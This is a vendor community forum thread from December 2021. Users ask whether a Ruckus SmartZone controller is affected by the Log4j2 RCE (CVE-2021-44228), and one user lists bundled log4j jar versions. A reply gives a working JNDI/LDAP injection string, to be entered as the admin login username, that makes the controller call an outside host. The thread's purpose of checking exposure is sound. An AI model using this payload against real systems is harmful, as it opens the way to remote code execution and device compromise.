CommScope RUCKUS Community Forums

dawoon_lee · ‎12-12-2021

Hello.

Our customer is running a Ruckus SmartZone (sz-100) controller.
The version of the controller is 5.1.1.0.598.

The customer asked if the SmartZone has the following this security vulnerabilities.

** Vulnerability: [CVE-2021-44228] Apache Log4j2 RCE

Thank you for your valuable answers to the above questions.

torge_szczepane · ‎12-13-2021

I tested this myself on the weekend. Our virtual smartzone is affected.

Logging in to the Admin page by using a username:

${jndi:ldap://a.b.c.d:6666/a}

(replace a.b.c.d with a ip which is reachable by the controller)

will send out a request to this ip in a request for possible malware. I have shutdown my controller on the weekend.

torge_szczepane · ‎12-13-2021

Filesystem content of VSZ Image:

./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.13.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.6.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.6.6.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.17.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-slf4j-impl-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-jcl-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-web-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-api-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-to-slf4j-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-core-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-core-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/slf4j-log4j12-1.7.5.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.7.25.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.16.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-api-2.8.2.jar

...

dawoon_lee · ‎12-13-2021

@torge_szczepanek

Does the above also affect smartzone? (not virtual)

torge_szczepane · ‎12-13-2021

My guess would be, that this is the same software just as a appliance. But this is just a guess. We do not have Smartzone devices.

mark_pledl · ‎12-13-2021

@torge_szczepanek - good spot!

Br,

Mark.